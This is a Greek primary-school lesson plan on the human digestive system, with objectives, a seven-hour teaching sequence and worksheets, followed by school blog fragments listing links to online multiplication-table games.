Το σενάριο είναι απόλυτα συμβατό με το αναλυτικό πρόγραμμα σπουδών  υποχρεωτικής εκπαίδευσης (Α.Π.Σ.) και με το διαθεματικό ενιαίο πλαίσιο  προγραμμάτων σπουδών (Δ.Ε.Π.Π.Σ.) . Οι στόχοι που τίθενται άπτονται πλήρως του  Αναλυτικού Προγράμματος Φυσικών.

 

1.5. ΟΡΓΑΝΩΣΗ ΤΗΣ ΔΙΔΑΣΚΑΛΙΑΣ & ΑΠΑΙΤΟΥΜΕΝΗ ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:

ΟΡΓΑΝΩΣΗ ΔΙΔΑΣΚΑΛΙΑΣ:

Το σενάριο απευθύνεται στα δύο τμήματα της Ε΄ τάξης σε σύνολο 26 μαθητών. Θα   εργαστούν σε ομάδες των 3-4 ατόμων.

 

         ΥΛΙΚΟΤΕΧΝΙΚΗ ΥΠΟΔΟΜΗ:

Κατά την πραγματοποίηση του σεναρίου θα χρειαστούν Η/Υ και οι μαθητές θα εργαστού στην αίθουσα των υπολογιστών. Επίσης θα χρησιμοποιηθούν: διαδραστικός πίνακας, εκτυπωτής, φύλλα εργασίας και ένα μοντέλο ανθρωπίνου σώματος σε πραγματικές   διαστάσεις.

 

         ΠΡΟΑΠΑΙΤΟΥΜΕΝΕΣ ΓΝΩΣΕΙΣ:

Οι μαθητές ήδη γνωρίζουν την έννοια της ενέργειας, καθώς και το ρόλο της τροφής.
Έχουν μάθει να εργάζονται ομαδοσυνεργατικά. Τέλος, γνωρίζουν τις βασικές δεξιότητες  χρήσης του Η/Υ και είναι σε θέση ν’ ανταποκριθούν σε δραστηριότητες που θα τους ανατεθούν.

 

1.6. ΔΙΔΑΚΤΙΚΟΙ ΣΤΟΧΟΙ:

        Α. ΩΣ ΠΡΟΣ ΤΟ ΓΝΩΣΤΙΚΟ ΑΝΤΙΚΕΙΜΕΝΟ

Οι μαθητές να αναφέρουν τα όργανα του πεπτικού συστήματος και να εξηγούν τη  λειτουργία καθενός από αυτά.

Να εντοπίσουν σε τομή του ανθρωπίνου σώματος τη θέση των οργάνων αυτών.

Να διαπιστώσουν πειραματικά τη χρησιμότητα του σάλιου.

Να διαπιστώσουν πειραματικά τη χρησιμότητα της χολής.

         Β. ΩΣ ΠΡΟΣ ΤΗ ΧΡΗΣΗ ΤΩΝ ΝΕΩΝ ΤΕΧΝΟΛΟΓΙΩΝ

Να αναπτύξουν θετική στάση απέναντι στους Η/Υ.
Να αναζητούν, να αξιολογούν, να επιλέγουν και να αποθηκεύουν πληροφορίες από το   διαδίκτυο.

 

Γ. ΩΣ ΠΡΟΣ ΤΗ ΜΑΘΗΣΙΑΚΗ ΔΙΔΑΣΚΑΛΙΑ
Να παρατηρούν, να μελετούν, να συμπεραίνουν.

Να καλλιεργήσουν την αναλυτική και συνθετική ικανότητα.
Να αναπτύξουν την κριτική τους ικανότητα, τη δημιουργική τους σκέψη, τη φαντασία τους.

Να βιώσουν τη χαρά της έρευνας και της δημιουργίας.
Να τονώσουν την αυτοπεποίθησή τους, συμμετέχοντας σε ομαδικές δραστηριότητες.

 

1.7. ΕΚΤΙΜΩΜΕΝΗ ΔΙΑΡΚΕΙΑ:

Υπολογίζεται ότι απαιτούνται επτά (7) διδακτικές ώρες.

 

2. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ

 

ΘΕΩΡΗΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Ακολουθείται ένα μοντέλο ομαδοσυνεργατικής –  ανακαλυπτικής μεθόδου. Δίνεται έμφαση στην κριτική σκέψη, στη συνεργατική μάθηση, στη δημιουργική έκφραση. Οι μαθητές εργάζονται σε ομάδες, αξιοποιώντας τη χρήση των Τ.Ε.Π.
Οι έννοιες και οι πληροφορίες οπτικοποιούνται και εξελίσσονται. Ο μαθητής μπορεί να  αυτενεργήσει, να αναλάβει πρωτοβουλίες, να επέμβει ενεργά.

 

ΜΕΘΟΛΟΓΙΚΗ ΠΡΟΣΕΓΓΙΣΗ: Οι ομαδοσυνεργατικές διαδικασίες συντονίζονται και   καθοδηγούνται από τον εκπαιδευτικό. Ο ρόλος του είναι υποστηρικτικός και ενθαρρυντικός.
Δίνονται στους μαθητές κίνητρα ώστε να εκφράσουν τις απόψεις τους, να αξιολογήσουν τις απόψεις των συμμαθητών τους και μέσα από την ανταλλαγή τους να οικοδομήσουν τη νέα  γνώση. Ο εκπαιδευτικός δίνει σαφείς οδηγίες, έχει ετοιμάσει τα φύλλα εργασίας τωνομάδων, έχει μελετήσει τις ιστοσελίδες που θα διερευνηθούν, έχει προβλέψει τυχόν   απρόοπτα κατά την εκτέλεση του διδακτικού σεναρίου.

 

2.1. ΔΙΔΑΚΤΙΚΗ ΠΡΟΣΕΓΓΙΣΗ ΜΕ Τ.Π.Ε.

             Η χρήση των Τ.Π.Ε. οδηγεί σε σύγχρονες προσεγγίσεις μάθησης, εξελίσσοντας το παραδοσιακό διδακτικό μοντέλο. Το Διαδίκτυο αξιοποιείται, ώστε να προωθήσει τις ήδη υπάρχουσες εμπειρίες, να οδηγήσει σε επεξεργασία πληροφοριών και γνώσεων και στην   ένταξή τους στα πλαίσιο που θέτουν το σενάριο και οι μαθητές.

Το Λογισμικό παρουσίασης επιτρέπει την παρουσίαση κειμένων, εικόνων, βίντεο και ήχων.
Αποτελεί εργαλείο απλό ως προς την εκμάθηση και το χειρισμό, που επιτρέπει την ενίσχυση της γνώσης.

Ο Επεξεργαστής κειμένου, ως εργαλείο επεξεργασίας και διαχείρισης πληροφοριών,   διευκολύνει την παραγωγή γραπτού λόγου ομαδοσυνεργατικά. Οι μαθητές καταλήγουν σε   δικά τους κείμενα, καλλιεργώντας τη γλωσσική τους έκφραση.

 

 

2.2. ΤΟ ΠΡΟΤΕΙΝΟΜΕΝΟ ΣΕΝΑΡΙΟ – ΠΟΡΕΙΑ ΔΙΑΔΑΣΚΑΛΙΑΣ ΚΑΙ ΥΛΟΠΟΙΗΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΩΝ

 

              1η + 2η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Η αφόρμηση γίνεται με την παρουσίαση ψηφιακού δίσκου –   CDRom, που δείχνει την πορεία της τροφής. Κατά τη διάρκεια της προβολής γίνονται    σχολιασμοί και αποσαφηνίσεις. Στη συνέχεια, με τη βοήθεια του μοντέλου του ανθρωπίνου σώματος, φέρνουμε τα παιδιά σε επαφή με τα όργανα του πεπτικού συστήματος. Με κατάλληλες ερωτήσεις προκαλούμε συζήτηση για τη χρησιμότητα των οργάνων.

Πραγματοποιούμε τα πειράματα στο Τ.Ε. του μαθητή, που αφορούν το σάλιο και την  τροφή.

Ζητείται από τους μαθητές να καταγράψουν τη χρησιμότητα των οργάνων και το ρόλο τους στο πεπτικό σύστημα στο 1° φύλλο εργασίας.

 

             3η + 4η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Στο εργαστήριο πληροφορικής τα παιδιά αναζητούν στο
διαδίκτυο πληροφορίες και εικόνες που αφορούν το πεπτικό σύστημα. Επιλέγουν αυτές
που χρειάζονται, τις επεξεργάζονται και γράφουν ένα μικρό κείμενο, για το 2° φύλλο
εργασίας: ” Συλλέγοντας πληροφορίες για το πεπτικό σύστημα”.

 

            5η + 6η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Αφού έχουν συλλέξει πληροφορίες και εικόνες, τις παρουσιάζουν με το κατάλληλο λογισμικό παρουσιάσεων στους συμμαθητές τους. Αυτό είναι το 3° φύλλο  εργασίας:  “Δημιουργώ μια παρουσίαση για το πεπτικό σύστημα”.

 

7η ΔΙΔΑΚΤΙΚΗ ΩΡΑ: Δίνεται το 4° φύλλο εργασίας με θέμα: ” Τι έμαθα για το πεπτικό
σύστημα”.

 

2.3. ΕΠΕΚΤΑΣΗ ΔΡΑΣΤΗΡΙΟΤΗΤΑΣ – ΑΞΙΟΛΟΓΙΣΗ

 

             ΕΠΕΚΤΑΣΗ: Οι μαθητές θα μπορούσαν να επεκταθούν με άλλες δραστηριότητες:

– Δημιουργία ακροστοιχίδας για το πεπτικό σύστημα.

– Δημιουργία κολλάζ σε χαρτόνι εικόνων του ανθρωπίνου σώματος.

– Δημιουργία μοντέλου του πεπτικού συστήματος με πλαστελίνη την ώρα των Εικαστικών.

 

ΑΞΙΟΛΟΓΙΣΗ: Η αξιολόγηση γίνεται καθ’ όλη τη διάρκεια του σεναρίου. Πραγματοποιείται σε συνάρτηση με την ανάπτυξη πρωτοβουλιών και την εκτέλεσή του, τη συνεργασία στα   πλαίσια των ομάδων, την επιτυχία των στόχων που έχουν τεθεί, την αξιοποίηση των Τ.Π.Ε.,  την εποικοδομητική χρήση διαλόγου και επιχειρημάτων, την έκφραση των συναισθημάτων του μαθητή ( χαρά, ικανοποίηση, αδιαφορία, δυσκολία κ.λ.π.)

 

ΦΥΛΛΑ ΕΡΓΑΣΙΑΣ

       

            1° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

             “Η χρησιμότητα των οργάνων του πεπτικού συστήματος”. Οι μαθητές γράφουν στο Φ.Ε. ή στον κειμενογράφο του υπολογιστή, για τη χρησιμότητα του κάθε οργάνου του Πεπτικού Συστήματος. Κάθε ομάδα ασχολείται με ένα θέμα από τα παρακάτω:

 

“Η χρησιμότητα της στοματικής κοιλότητας και του σάλιου”

“Η χρησιμότητα του οισοφάγου”

“Η χρησιμότητα του στομάχου, των γαστρικών υγρών και του παγκρέατος”

“Η χρησιμότητα του λεπτού εντέρου”

“Η χρησιμότητα του παχέως εντέρου, του συκωτιού και της χολής¨.

 

2° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

“Συλλέγοντας πληροφορίες για το Πεπτικό Σύστημα”.

Η κάθε ομάδα συλλέγει πληροφορίες και εικόνες που θα βρουν στις ιστοσελίδες που θα τους δοθούν (η κάθε ομάδα για το αντικείμενό της). Με βάση τις πληροφορίες αυτές, η κάθε  ομάδα γράφει ένα μικρό κείμενο για το όργανο του πεπτικού συστήματος που έχει αναλάβει.

 

           3° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ:

          “Παρουσιάζοντας τα όργανα του Πεπτικού Συστήματος”.

 

4° ΦΥΛΛΟ ΕΡΓΑΣΙΑΣ

“Τι έμαθα για το Πεπτικό Σύστημα”

 

1. Τι ονομάζουμε Πεπτικό Σύστημα; Τι λειτουργία επιτελεί;

2.  Ποια είναι τα όργανα του Πεπτικού Συστήματος;
3. α) Ποια ουσία εκκρίνεται από τους σιελογόνους αδένες;
Ποια η χρησιμότητά της;

β)  Ποια ουσία εκκρίνεται από το συκώτι;

Ποια η χρησιμότητά της;
                         Καλή μας Όρεξη!!!

ΦΙΛΑΝΑΓΝΩΣΙΑ

Οι φίλοι μας οι Ρώσοι ξανά στο σχολείο μας

ΠΑΙΧΝΙΔΙΑ ΜΕ ΤΗΝ ΠΡΟΠΑΙΔΕΙΑ

 ΠΑΙΧΝΙΔΙΑ ΜΕ ΤΗΝ ΠΡΟΠΑΙΔΕΙΑ

 

Για να λύνουμε πολλαπλασιασμούς χρειάζεται να ξέρουμε πολύ καλά την προπαίδεια. Μπορούμε να εξασκηθούμε στην προπαίδεια παίζοντας κάποιο από τα παρακάτω παιχνίδια.

Κάντε κλικ στον σύνδεσμο έχοντας ταυτόχρονα πατημένο το πλήκτρο Control και θα μεταφερθείτε στην ανάλογη ιστοσελίδα.

 

ΓΡΗΓΟΡΟΙ ΣΕΡΒΙΤΟΡΟΙ

http://www.multiplication.com/games/play/pizza-pizzazz

http://www.learnyourtables.co.uk/gk/index2.htm

http://e-math.eduportal.gr/efarmoges/poll.html

ΧΙΟΝΟΠΡΟΠΑΙΔΕΙΑ

http://e-math.eduportal.gr/efarmoges/xion.htm

ΤΑ ΜΥΡΜΗΓΚΙΑ ΠΕΙΝΑΝΕ

http://www.multiplication.com/games/play/marching-ants

ΠΛΥΣΙΜΟ ΑΥΤΟΚΙΝΗΤΩΝ

http://www.multiplication.com/games/play/car-wash

ΑΓΩΝΕΣ ΣΤΗ ΘΑΛΑΣΣΑ

http://www.multiplication.com/games/play/aquatic-speedway

ΞΕΚΛΕΙΔΩΣΕ ΤΑ ΧΡΩΜΑΤΑ

http://www.multiplication.com/games/play/color-creations

ΠΑΙΞΕ ΤΑ ΤΥΜΠΑΝΑ

http://www.multiplication.com/games/play/jungle-jim-plays-drums

ΣΟΥΠΕΡ ΑΣΤΕΡΙΑ

http://www.multiplication.com/games/play/super-stars

 

 

Λέξεις Κλειδιά σε αναζητήσεις:

Επίσκεψη στον υγρότοπο Μουστού 23 Ιανουαρίου 2013